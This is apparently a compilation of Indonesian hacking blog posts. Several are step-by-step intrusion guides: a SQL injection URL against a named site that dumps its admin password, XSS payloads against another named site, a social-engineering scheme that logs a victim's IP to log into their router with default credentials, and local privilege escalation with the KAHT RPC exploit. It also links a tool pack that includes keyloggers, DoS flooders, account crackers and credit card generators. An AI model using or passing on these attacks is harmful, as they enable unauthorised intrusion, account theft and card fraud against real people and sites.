Sebelumnya silahkan membaca artikel fungsi require, require_once, include, dan include_one RFI sendiri terjadi karena kesalahan programmer ketika  melakukan coding, yakni menggunakan variable dalam fungsi-fungsi tersebut.  Apabila user memasukkan url evil script miliknya pada variable yang digunakan  dalam fungsi require ataupun include, yang terjadi adalah evil script tersebut  dapat dieksekusi secara remote, dengan kata lain, attacker dapat menjalan  command di server milik anda untuk merubah konten situs atau bahkan merusaknya.  ~~

Untuk contohnya silahkan anda cari di www.milw0rm.com ~

Keywordnya Remote File Inclusion. ~

Pengecekan BUG
Pengecekan bug sendiri bisa dilakukan secara manual. Hmmm  … tentunya ini akan memakan banyak waktu. Terbentuklah tools yang dapat  secara cepat dan otomatis menemukan bug-bug yang terselip di php script secara  tidak sengaja maupun sengaja. ~
   
Pada dasarnya untuk mengecek bug dapat dilakukan secara  online maupun offline. Penulis sarankan pengecekan bug ini dilakukan di  localhost anda ( offline ) saja.

Cek Bug XSS
Tools untuk mengecek XSS pada script php milik anda  adalah sebuah addons mozilla firefox yang disediakan secara gratis.  Penginstallannya pun tergolong mudah, berikut juga cara penggunaannya.
   
Tools tersebut dapat  anda download disini :
http://www.securitycompass.com/exploit_me/xssme/xssme-0.2.1.xpi

Cek Bug SQL Injection
Untuk periode saat ini defacing dengan SQL Injection  digolongkan paling favorit dan tentunya paling banyak digunakan, mungkin karena  penyerangan yang dilakukan cukup mudah, cukup memiliki dasar pengetahuan syntax  sql. Lagi-lagi sebuah addons mozilla firefox yang cukup ampuh dan mudah  digunakan telah disediakan untuk melakukan cek bug sql injection.
   
Anda dapat mendownloadnya disini :
http://www.securitycompass.com/exploit_me/sqlime/sqlime-0.2.xpi

Penggunaanya pun tidak terlalu sulit.

Cek BUG Remote File Inclusion
Sebelumya anda download terlebih dahulu scriptnya disini http://www.newhack.org/dl_jump.php?id
Setelah itu silahkan download active perl, compiler  interpreter ini nantinya digunakan untuk menjalankan script  inclusionscanner.pl.
Dan kemudian copykan inclusionscanner.pl tersebut ke  direktori c:\perl\bin

Langkah selanjutnya :

1. Masukkan  script  yang akan anda scan kedalam sebuah direktori di c:\perl php.

ex : c:\perl\wordpress.

2. Masuk ke command prompt, start | run | cmd | enter

3.  Setelah itu  masuk ke direktory c:\perl\bin, cd c:\perl\bin

4. Jalankan scriptnya,

C:\Perl\bin>perl.exe inclusionscanner.pl

#Will check a directory for all includes and unsets

#Coded by Ironfist (ironsecurity.nl)

#Usage: create a folder in your perlfolder and put the  files to be scanned in it

, next type the folder name below (eg myfolder)

#GIVES ERRORS WHEN CHECKING SUBFOLDERS: IGNORE THEM
 
Directory to read? c:\perl\wp
 
kemudian lihat hasilnya di c:\perl\bin\result.html
 
berikut hasil scan ketika penulis mencoba untuk melakukan  cek inclusion pada wordpress-2.3.3 :
   
  FOUND: require_once($locale_file);
  in c:\perl\wp/wp-settings.php FOUND:  require_once($import_root . ‘/’ . $file);
  in c:\perl\wp/wp-admin/import.php FOUND:  include_once($this->PluginDir . “class-smtp.php”);
  in c:\perl\wp/wp-includes/class-phpmailer.php FOUND:  include($lang_path.’phpmailer.lang-’.$lang_type.’.php’);
  in c:\perl\wp/wp-includes/class-phpmailer.php FOUND:  include($lang_path.’phpmailer.lang-en.php’);
  in c:\perl\wp/wp-includes/class-phpmailer.php FOUND:  include($template);
  in c:\perl\wp/wp-includes/template-loader.php FOUND:  include($template);
  in c:\perl\wp/wp-includes/template-loader.php FOUND:  include($template);
  in c:\perl\wp/wp-includes/template-loader.php FOUND:  include($template);
  in c:\perl\wp/wp-includes/template-loader.php FOUND:  include($template);
  in c:\perl\wp/wp-includes/template-loader.php FOUND:  include($template);
  in c:\perl\wp/wp-includes/template-loader.php FOUND:  include($template);
  in c:\perl\wp/wp-includes/template-loader.php FOUND:  include($template);
  in c:\perl\wp/wp-includes/template-loader.php FOUND:  include($template);
  in c:\perl\wp/wp-includes/template-loader.php FOUND:  include($template);
  in c:\perl\wp/wp-includes/template-loader.php FOUND:  include($template);
  in c:\perl\wp/wp-includes/template-loader.php FOUND:  include($template);
  in c:\perl\wp/wp-includes/template-loader.php FOUND:  include($template);
  in c:\perl\wp/wp-includes/template-loader.php FOUND:  require_once($_template_file);
in c:\perl\wp/wp-includes/theme.php

woww !!! ~~ silahkan di exploitasi eh di patch script  milik anda. ~~

Ingat, jangan merusak, jangan berbuat vandal, jika anda  menemukan bug di situs lain seperti yang telah saya sebutkan diatas, silahkan  beritahu pihak admin.greetz to : ilmuwebsite staff, member ilmuwebsite,

special for jojo and her baby.

-Training Module 1 Ethical Hacking and Penetration Testing – cd 1
-Training Module 2 Footprinting and Reconnaissance – cd 2
-Training Module 3 TCP IP Basics and Scanning – cd 3
-Training Module 4 Enumeration and Verification – cd 4
-Training Module 5 Hacking Defending Wireless Modems – cd 5
-Training Module 6 Hacking Defending Web Servers – cd 6
-Training Module 7 Hacking Defending Web Applications – cd 7
-Training Module 8 Sniffers and Session Hijacking – cd 8
-Training Module 9 Hacking Defending Windows Systems – cd 9
-Training Module 10 Hacking Defending Unix Systems – cd 10
-Training Module 11 Rootkits Backdoors Trojans Tunnels – cd 11
-Training Module 12 Denial of Service and Botnets – cd 12
-Training Module 13 Automated Pen Testing Tools – cd 13
-Training Module 14 Intrusion Detection Systems – cd 14
-Training Module 15 Firewalls – cd 15
-Training Module 16 Honeypots and Honeynets – cd 16
-Training Module 17 Ethics and Legal Issues – cd 17

http://rapidshare.com/files/194379379/Gxc.VT.CAHPTaCT_UDS.part01.rar
http://rapidshare.com/files/194382133/Gxc.VT.CAHPTaCT_UDS.part02.rar
http://rapidshare.com/files/194377149/Gxc.VT.CAHPTaCT_UDS.part03.rar
http://rapidshare.com/files/194377617/Gxc.VT.CAHPTaCT_UDS.part04.rar
http://rapidshare.com/files/194379332/Gxc.VT.CAHPTaCT_UDS.part05.rar
http://rapidshare.com/files/194377712/Gxc.VT.CAHPTaCT_UDS.part06.rar
http://rapidshare.com/files/194377133/Gxc.VT.CAHPTaCT_UDS.part07.rar
http://rapidshare.com/files/194379107/Gxc.VT.CAHPTaCT_UDS.part08.rar
http://rapidshare.com/files/194379430/Gxc.VT.CAHPTaCT_UDS.part09.rar
http://rapidshare.com/files/194377280/Gxc.VT.CAHPTaCT_UDS.part10.rar
http://rapidshare.com/files/194379072/Gxc.VT.CAHPTaCT_UDS.part11.rar
http://rapidshare.com/files/194380389/Gxc.VT.CAHPTaCT_UDS.part12.rar
http://rapidshare.com/files/194379054/Gxc.VT.CAHPTaCT_UDS.part13.rar
http://rapidshare.com/files/194379376/Gxc.VT.CAHPTaCT_UDS.part14.rar
http://rapidshare.com/files/194377484/Gxc.VT.CAHPTaCT_UDS.part15.rar
http://rapidshare.com/files/194379264/Gxc.VT.CAHPTaCT_UDS.part16.rar
http://rapidshare.com/files/194380491/Gxc.VT.CAHPTaCT_UDS.part17.rar
http://rapidshare.com/files/194379192/Gxc.VT.CAHPTaCT_UDS.part18.rar
http://rapidshare.com/files/194379700/Gxc.VT.CAHPTaCT_UDS.part19.rar
http://rapidshare.com/files/194377767/Gxc.VT.CAHPTaCT_UDS.part20.rar
http://rapidshare.com/files/194378937/Gxc.VT.CAHPTaCT_UDS.part21.rar
http://rapidshare.com/files/194380403/Gxc.VT.CAHPTaCT_UDS.part22.rar
http://rapidshare.com/files/194379344/Gxc.VT.CAHPTaCT_UDS.part23.rar
http://rapidshare.com/files/194377766/Gxc.VT.CAHPTaCT_UDS.part24.rar
http://rapidshare.com/files/194381936/Gxc.VT.CAHPTaCT_UDS.part25.rar
http://rapidshare.com/files/194379027/Gxc.VT.CAHPTaCT_UDS.part26.rar
http://rapidshare.com/files/194379882/Gxc.VT.CAHPTaCT_UDS.part27.rar
http://rapidshare.com/files/194379279/Gxc.VT.CAHPTaCT_UDS.part28.rar
http://rapidshare.com/files/194377828/Gxc.VT.CAHPTaCT_UDS.part29.rar
http://rapidshare.com/files/194379311/Gxc.VT.CAHPTaCT_UDS.part30.rar
http://rapidshare.com/files/194385532/Gxc.VT.CAHPTaCT_UDS.part31.rar
http://rapidshare.com/files/194385469/Gxc.VT.CAHPTaCT_UDS.part32.rar
http://rapidshare.com/files/194383279/Gxc.VT.CAHPTaCT_UDS.part33.rar
http://rapidshare.com/files/194385282/Gxc.VT.CAHPTaCT_UDS.part34.rar
http://rapidshare.com/files/194385524/Gxc.VT.CAHPTaCT_UDS.part35.rar
http://rapidshare.com/files/194385305/Gxc.VT.CAHPTaCT_UDS.part36.rar
http://rapidshare.com/files/194381537/Gxc.VT.CAHPTaCT_UDS.sfv

mirror  :

http://www.megaupload.com/?d=HROI2ZAV
http://www.megaupload.com/?d=242ZNM7E
http://www.megaupload.com/?d=QY14I10X
http://www.megaupload.com/?d=NHOLUTCO
http://www.megaupload.com/?d=Y9BSB284
http://www.megaupload.com/?d=5GCV9UA3
http://www.megaupload.com/?d=J41JSY0G
http://www.megaupload.com/?d=TXKSRAI8
http://www.megaupload.com/?d=DHF8UMKY
http://www.megaupload.com/?d=RLXSOPTK
http://www.megaupload.com/?d=5O0YFY79
http://www.megaupload.com/?d=RLHUHJDS
http://www.megaupload.com/?d=YNVEK8LB
http://www.megaupload.com/?d=RNYWZ64V
http://www.megaupload.com/?d=J42I6OSZ
http://www.megaupload.com/?d=1EC6S73S
http://www.megaupload.com/?d=25CAZSL2
http://www.megaupload.com/?d=0BZ0FPO1
http://www.megaupload.com/?d=JRPO74HU
http://www.megaupload.com/?d=Z6S34VR6
http://www.megaupload.com/?d=TDXJH9JZ
http://www.megaupload.com/?d=GNCSKLL3
http://www.megaupload.com/?d=LYI3SY94
http://www.megaupload.com/?d=8D3E0R6O
http://www.megaupload.com/?d=0022RC7Z
http://www.megaupload.com/?d=ASMBUELW
http://www.megaupload.com/?d=5XMX3AIZ
http://www.megaupload.com/?d=IPWD9NSU
http://www.megaupload.com/?d=DWQ3469B
http://www.megaupload.com/?d=WL91FDR7
http://www.megaupload.com/?d=TISTATGB
http://www.megaupload.com/?d=1OTQAHLA
http://www.megaupload.com/?d=Q2JTKAHH
http://www.megaupload.com/?d=OUNUNGAP
http://www.megaupload.com/?d=K4GMUQYF
http://www.megaupload.com/?d=QJNKWK0H
http://www.megaupload.com/?d=HP3D8TLB

mirror 2

http://www.mediafire.com/?sharekey=283842fd3dc3e7ef91b20cc0d07ba4d2abc972a2ae368c4b

XxxPass-Team 2007
Danger Cracking & Hacking Tools – Ver 1.0

- Exploit Collection (4 Tools)
- Google Hacking (4 Tools)
- Keyloggers (5 Tools)
- Binder & Packer (15 Tools)
- Flood_DOS (20 Tools)
- Messenger (11 Tools)
- Bruter (9 Tools)
- Anonimity (1 Tool)
- !!! $$$ !!! (13 Tools)
- AIO

Exploit Collection

1. 10377 Exploit
2. SMF ShoutBox Xss & HTML Injection
3. SMF Ultimate Shoutbox Cookie Disclosure Exploit
4. Firefox_BuG

Messenger

1. MSN Extreme 3.0
2. MSN Spy Lite v1.0
3. Yahoo Hack!
4. Hotmail Email Hacker
5. Hotmail Hacker Gold
6. HotmailHack
7. YahooUltraCracker
8. winks,moods,mugins,weemees and meegos + Installer
9. MSN Messenger Account Cracker v2.0
10. SH Yahoo Pass Sender 1.1
11. Yahoo Password Decoder

Google Hacking

1. Alt GooGle
2. Google Version 1.2
3. Google H4ck3r (3 programs)
4. GooLink

Keyloggers

1. Elgolf 1.0 Beta
2. ESK KeyLogger
3. Glog Keylogger
4. HermanAgent
5. IKlogger0.1

Bbruter

1. WebCrack v4.0
2. Brutus
3. Crack FTP
4. FTP Brute Hacker
5. phpbb bruteforcer
6. PhpBB Pass Extractor
7. phpBB Cracker
8. Email Cracker
9. FTP Brute Forcer

!!! $$$ !!!

1. Cmaster
2. CC Verify
3. CWizard
4. THCC
5. Visa Card Generator 06
6. Carcabot_Mass_Email
7. CcHack
8. CC-Fake
9. cvv2c
10. DesertCVV2
11. id-fake
12. Paypal-Link-Spoofed
13. HoW to get Credit Cards Fresh and Fastest

AIO

1. Uploader for All
2. Cool Small Usefull Dp

Flood DOS

1. Flowbabeflow
2. FreeSiteKiller V 2.01
3. Webxgrab
4. Web Attacker ENG
5. TheRapist-Dos Attacker
6. HybridFlood2
7. Ati-russ 3.0
8. Http Bomber v1.001b
9. Sprut
10. DoS_5
11. etherflood
12. DoSAttacker
13. phpBB Dos
14. phpBB Attacker
15. Ping Attack
16. Site Nuke
17. Divine Intervention
18. UC Forum Spammer
19. Inferno Nuker
20. Multiple Site Flood

Silahkan di download di : Updated Links !!! Hacking tools 2007

http://rapidshare.com/files/85433778/XxxPass-C_H_Ver1.0-_2007-part1_up_by_juur.xup.pl.part1.rar
http://rapidshare.com/files/85426770/XxxPass-C_H_Ver1.0-_2007-part1_up_by_juur.xup.pl.part2.rar

Pass : XxxPass_DJ_haselking
Pass :-XxxPass_DJ_haselking

Hack … hack … hack the World !!
( Just for lamerz )

Sama dengan bug-bug yang lainnya, konfigurasi default akan membuat pihak luar yang tidak diinginkan seperti cracker dengan mudah mengeksploitasi secara besar-besaran sehingga memanen username dan password menjadi sesuatu yang memungkinkan sekali untuk dilakukan. Contoh bug yang buruk, yaitu username default dan password yang default.

Sebelum ngejabarin masalah teknisnya, berikut alat-alat yang diperlukan :

Browser Internet ( mau yang banyak bugnya, maupun yang sedikit bugnya )

Website dengan log system flat file ( diambil dari artikelnya Anggi J. )

Aplikasi Instant Messaging, ex : Yahoo Messenger ( Social Engineering )

Internet Password Asterisk Reveal

( http://www.nsauditor.com/freeware/downloads/IEAstRecover.exe )

Langkah Pertama

Silahkan anda baca artikel http://www.ilmuwebsite.com/detil_php_tutorial/2/_Membuat_System_LOG_dengan_FLAT_FILE/
, cara memasang log system flat file. Digunakan untuk mendapatkan alamat ip dari sang korban.

Langkah Ke Dua

Inti dari artikel ini adalah pencarian user yang akan dijadikan korban. Anda bisa menggunakan aplikasi IRC ataupun instant messaging yang lainnya. Alangkah baiknya anda menggunakan aplikasi IRC, seperti mIRC ataupun yang lainnya, karena fasilitas whois yang ada didalamnya mempermudah kita untuk segera mengetahui IP sang korban, tapi pada beberapa kasus, adakalanya user yang advanced menggunakan anonymous proxy yang tentunya menyembunyikan IP asli miliknya. Sehingga perlu teknik social engineering yang lebih ampuh lagi. Berikut ada sedikit percakapan antara seseorang sebagai intruder dengan sang korban menggunakan aplikasi yahoo messenger :

Mamang (intruder) : dah liat situs ini belom, ilmuwebsite.com ???

Sang_korban : apaan tuh ?

Mamang (intruder ) : situs keren punya orang keren, ngebahas tentang berbagai artikel mengenai kekerenan. Coba deh liat.

Sang_korban : coba, gw liat dulu. # kena!!

Mamang ) intruder ) : gimana keren kan ? eh, gw off dulu yah. C U

Situs ilmuwebsite.com tersebut, merupakan sebuah contoh situs yang anda gunakan untuk merecord ip sang korban. Anda bisa memasang log system flat file pada situs milik anda. Dengan mengusahakan sang korban tertarik untuk mengunjungi situs yang telah dipasang log system flat file.

Contoh IP yang sudah dilog dalam flat file,

Waktu: Fri, 06 Jul 2007 12:47:04 +0700 | IP asli: 125.161.2.85 | Browser: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)  | URL: / | Referrer: | Proxy:  | Koneksi:

Langkah Ketiga

Setelah mendapatkan alamat ip sang korban, yang perlu anda lakukan adalah membuka browser, kemudian pada address bar isi dengan alamat ip yang telah anda dapatkan, sebagai contoh yang saya dapatkan adalah http://125.160.#.# isikan username dengan admin dan passwordnya admin. Jika anda beruntung, anda akan langsung dihadapkan kepada halaman username ADSL dan tentunya password yang asterisk. Untuk membuka password yang asterisk, anda cukup menggunakan Internet Password Asterisk Reveal.

Penanganan

Sebenarnya dengan mengganti password yang default pun itu sudah bisa mencegah teknik seperti ini. Dan intinya password yang kuatlah yang susah untuk dimanfaatkan. Password yang kuat ini memiliki lebih dari 8 digit, dan merupakan gabungan dari angka huruf dan special character. Ex: ilmVw3851te –> bentuk lain dari ilmuwebsite

Sayangnya, telkom telah menerapkan system yang unique, sehingga account speedy tidak bisa digunakan pada jaringan telepon yang berbeda. Dan tentunya anda tidak bisa men-take over account yang sudah didapatkan. Mohon Maaf, artikel ini hanya sebagai contoh pembelajaran.

Default password untuk setiap modem :

http://www.elitehackers.info/defaultpasslist.php

// Greetz :

Special for mylovely, terima kasih infonya, ide-nya jadi makin bertambah.

Bscorpio, phii, dan ryuzaki, ninjaring, barudak STTTelematika Ciawi Bogor.

Fel_c, Mentari^, Abang Dennis the Manace

Allguys Echo Member, #khilafah, pepei dwipangga dan konco-konconya di liberationyouth.com, anak-anak saveusgue

Tekhnik pertama :
Yang kita butuhkan sekarang adalah :
Petter Recovery Password yang bisa di download dari situsnya langsung http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html sekalian sama infonya aja, biasanya sudah di sediakan dalam bentuk rar yang bisa di jadikan bootdisk. Yang penulis pakai untuk experimen kali ini yaitu versi bd040818 terdapat 3 file di dalamnya yakni bd040818.bin , install.bat , rawrite2.exe .
1 buah disket kosong dan layak pakai. –> untuk disket boot Petter Recovery Password.
Nekatzzzz ….

Kasusnya begini, misalnya ….anggap saja kita lupa password untuk login winXP nya. : ) atau kasus yang laen aja kali ya, yang lebih menantang … hehehe. Misalnya ada rampok yang kebingungan nggak bisa login, padahal kompienya mo dijual … huehueueheue. Ada yang kesindir nggak nih ??? Udah ah bcanda mulu. Langsung aja deuh …

Langkah pertama … Setelah Petter Recovery Password di jadikan bootdisk, langsung saja booting dengan disket tersebut …
Langkah berikutnya, anda akan di tanya di drive mana SAM file berada. Tekan enter saja untuk defaultnya, setelah itu akan ditanyakan secara spesifik lagi, di direktori mana file SAM berada, biasanya untuk yang defaultnya tuh SAM file berada di /windows/system32/config, enter lagi aja untuk yang defaultnya. Setelah itu ……. Nah sampe disini anda akan di minta User mana yang ingin di ganti/hapus passwordnya. Lebih baik Administrators aja, karena yang kita lakukan saat ini kan mencari cara untuk menjadi SU di Windows XP. Biar gampang melakukan sesuatu nantinya …. hehehehe !!! Untuk eksperiment kali ini lebih baik anda membuat password Administrators menjadi blankpassword [* = blankpassword], supaya gampang nantinya, dan blankpassword merupakan pilihan terbaik dalam menggunakan Petter Password Recovery. Soalnya penulis sendiri telah belasan kali mencoba mengganti password para user dengan tetapi hanya 2 yang berhasil. Sudah ??? … siiiip, tekan ! untuk mengakhir sesi reset password, dan q untuk mengakhiri scripts tersebut. Selanjutnya anda akan di tanya kembali, ingin mengulang atau tidak. Lebih baik tidak lahhhh … Edit Completed. Catatan : Setelah menggunakan Petter Recovery Password, Windows berusaha untuk melakukan scandisk, system ne baru di acak-acak nie : ). Tunggu hingga proses scandisk selesai.
Setelah proses booting, anda akan di hadapkan dengan tampilan login yang seperti biasanya. ( Nggak menarik, hehehehe… ) Sekarang tekan ctrl+alt+del, tunggu sebentar dan kemudian tekan kembali ctrl+alt+del. Nah ada tampilan login yang clasic, seperti di windows 98 dulu. Dengan 2 textbox…

————————————————-
| Log On to Windows                         | x |
————————————————-
| User Name : Al-k                              |
| Password : ******                             |
|                                               |
| | Ok | | Cancel | | BLABLABLABLA….|         |
————————————————-

Ya, bentuknya kira-kira seperti diatas … : )…
Setelah itu ganti usernamenya menjadi Administrator, passwordnya di kosongkan saja, karena sebelumnya kita telah menjadikan blankpassword pada Administrator. Ok. Jreng-jreng-jreng… sekarang anda menjadi super user kembali. Silahkan buat account untuk anda sendiri.

Tekhnik Kedua :
Tiba saatnya kita maju bersama … , memanfaatkan Massive RPC WinXP yang bobrok. Tekhnik kedua ini dibuat untuk para user yang memiliki acces limited. Yang dibuat kesal oleh sang admin, sehingga untuk menginstall suatu software harus minta izin dari sang Admin. . Yang dibutuhkan hanyalah acces untuk masuk ke command shell, dan satu tool kecil ‘kaht’ . Siap ???… buka command promptnya …

C:\Documents and Settings\Al-k>net user

User accounts for \\NOMATTER  -------------------------------------------------------------------------------  Administrator Al-k GNU-- keluarga --  Guest HelpAssistant SUPPORT_388945a0  VUSR_NOMATTER  The command completed successfully.

// Anggap saja disini Al-k adalah user yang limited// Setelah itu masuk ke direktori di mana kaht berada

D:\Data+ku_>

Kemudian kita test dulu kaht-nya… bisa nggak nih kita nge-root.

  D:\Data+ku_>kaht 127.0.0.0 127.0.0.3_________________________________________________

  KAHT II - MASSIVE RPC EXPLOIT  DCOM RPC exploit. Modified by aT4r@3wdesign.es  #haxorcitos && #localhost @Efnet Ownz you!!!  FULL VERSION?   - AUTOHACKING  ________________________________________________

 [+] Targets: 127.0.0.0-127.0.0.3 with 50 Threads [+] Attacking Port: 135. Remote Shell at port: 34522 [+] Scan In Progress...  - Connecting to 127.0.0.2

  Sending Exploit to a [WinXP] Server...  - Conectando con la Shell Remota...

Microsoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Tuh kan dapet deh akses rootnya. Jangan seneng dulu. Langsung aja kita buat akses user yang terbatas tadi menjadi Super User. 



C:\WINDOWS\system32> net localgroup Administrators Al-k /add

  The command completed successfully.

  

Selanjutnya anda bisa login dengan user yang baru saja dirubah accountnya tadi. Dan anda bisa login ke account user lain yang memiliki akses sama seperti Administrator, tentunya dengan menghilangkan password user tersebut dulu sebelumnya. Dan anda bisa masuk ke regedit untuk menutup perizinan user account pada control panel :

HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/DisallowCpl/

, buat string baru dengan nama 1 dan ubah valuenya menjadi nusrmgr.cpl
Dan bisa anda disable akses ke command prompt kepada semua user. Sehingga anda menjadi SU yang benar-benar otoriter. Sayangnya tekhnik yang kedua ini hanya bisa di lakukan di Windows XP Service Pack 1. : (

// Refferensi :
– Seni Tekhnik Hacking 1 [S’to]
– Echo Zine 10, Exploitasi Windows XP [mRt]
– Iseng Instink

// Greetz :
– y3dips, Lirva32, z3r0byte ( Arabic Man ), the_day, S’to [duuh masuk TV tuk
yang kesekian kalinya nih ???] . & Echo staff who can’t mentioned 1 by 1.
– Alumni SMAN4 Bogor & All guy’s in STTTelematika Ciawi Bogor.
– Special for Jheseecka & Melati “Mel, ini artikel ke 1 dan ke 2-nya !!! “
– hg_ , Fel_c, Mentari^, the aeh, zacx, Azwa, Sita, Dulleh, Ibonx, weww, Qank-qunk,
AK47-angga, ninjaring
– Allguys in #yogyafree, Echo Member, #khilafah, #pribumi, #e-c-h-o, #freebase

Apaan sih XSS tuh ?
Mungkin anda yang akrab dengan dunia internet pernah men dengar istilah SQL Injection, XSS atau Cross Site Scripting. 2 kelemahan atau vulnerability pada sebuah website yang kerap kali dimanfaatkan oleh para cracker untuk menjalankan aksinya. Yang konon katanya, XSS ini juga di temukan oleh Mas Dani [ XNUXER Laboratory ] ketika  melakukan pen-test situs KPU.go.id beberapa tahun lalu. XSS pun bisa digunakan untuk mencuri cookies, sehingga seorang cracker bisa menggunakan identitas orang lain dengan menggunakan cookies hasil curian. XSS biasanya digunakan oleh newbie hacker yang tidak memiliki explo untuk menjalankan aksi ilegalnya.

Maksudnya apaan sih, nggak ngerti !
Singkat cerita, metode XSS dan SQL Injection digunakan untuk melakukan deface pada sebuah website. Istilah familiarnya “nge-hack website” walaupun pada kenyataannya deface itu tidak sama dengan hacking. Deface sendiri memiliki arti, merusak sebagian atau keseluruhan dari isi website.

Caranya gimana ???
Caranya nggak susah-susah amat, anda hanya perlu menggunakan browser anda untuk memanfaatkan vuln ini. Contoh situs yang masih bisa di XSS adalah :

http://www.malesbanget.com/kamus/definisi.php?kata=

untuk mengetes apakah situsnya masih bisa di XSS anda bisa menambahkan setelah kata=

<script>alert(‘Tes, XSS-nya masih bisa’)</script>

http://www.malesbanget.com/kamus/definisi.php?kata=<script>alert(‘Tes, XSS-nya masih bisa’)</script>

kemudian tekan enter …
kemudian akan muncul popup baru berisi ‘Tes, XSS-nya masih bisa’

Terus … ???
Masih banyak tag html yang bisa kita gunakan, tanya deh mamang Google.

contoh lainnya adalah :

http://www.malesbanget.com/kamus/definisi.php?kata=<h1>Hacked by Me</h1><h7>

Cuma gitu doang ???
Iya… segitu dulu aja entar di lanjut lagi. Tunggu aja.

Lagi-lagi bug baru di temukan, kali ini Al-k akan coba masuk
sebagai admin pada situs yang memiliki bug pada halaman subcat.php

langsung aja buka google-nya …
masukkan keyword ini inurl:/subcat.php?cate_id=

nah loh, dapet banyak bangett …
pilih aja salah satunya contoh :

http://www.estoop.it/subcat.php?cate_id=146&view=list&PHPSESSID=27c9b2b6500f2c01c09eda1978d45096

setelah cate_id= di hapus aja kemudian di ganti dengan

-1%20union%20select%200,concat(char(116,117,114,107,101,121,58),user_name,char(116,117,114,107,101,121,112,97,115,115,58),pas

sword),2%20from%20admin/*&view=list

kira kira jadi begini

http://www.estoop.it/subcat.php?cate_id=-1%20union%20select%200,concat(char(116,117,114,107,101,121,58),user_name,char(116,11

7,114,107,101,121,112,97,115,115,58),password),2%20from%20admin/*&view=list

nah loh passwordnya langsung dapet

turkey:adminturkeypass:daniel87

itu artinya
usernamenya admin
passwordnya daniel87

sekarang masuk ke control panelnya

http://www.estoop.it/admin
terus masukkin username dan passwordnya

jreng jreng jreng anda di bawa ke control panel …

hehehehe … deface deface …

    Hi, ketemu lagi dengan saya, sikeren Al-k.
    Sama seperti sebelum sebelumnya, yaitu artikel mengenai jebol password,
    tapi kali ini saya akan menjelaskannya pada Linux.
    Mungkin pada artikel yang lain telah di jelaskan bagaimana
    cara melakukan login tanpa password dengan bootloader Lilo,
    tapi kali ini saya akan menjelaskannya pada bootloader Grub.

    Beginilah caranya …

    1.) Defaultnya, pas di bootloader grub ada 2 pilihan yaitu Redhat Linux dan DOS.
         Pilih, yang Redhat Linux, terus tekan e di keyboard.
         Tombol e berguna untuk melakukan edit.

    2.) http://h1.ripway.com/alk/grub.png
         setelah itu, pilih bagian ke 2 atau 3, disitu tertulis kernel blablablablaba …
         tekan e dikeyboard

    3.) Kemudian tambahkan s atau single dibelakangnya, kira kira seperti ini

         kernel /boot/vmlinuz-2.6.15-1-686 root=/dev/sda1 ro single

         setelah itu Escape.

    4.) Masih dalam keadaan memilih kernel, kemudian tekan b di keyboard untuk Boot. anda akan di bawa  
         pada kedudukan root. Silahkan ketik passwd untuk mengganti password yang baru  atau anda bisa
         mengedit file /etc/shadow, untuk menghilangkan password pada root.

         Jreng jreng jreng … satu lagi, anda login sebagai administrator tanpa password

// Greetz :

- Fel_c, Mentari^, BLACK.SCORPIO, Zahra_Fakhrunisa, Lady_Sizuka, Upie, Ipank
- Allguys in #khilafah, http://www.jcunited.tk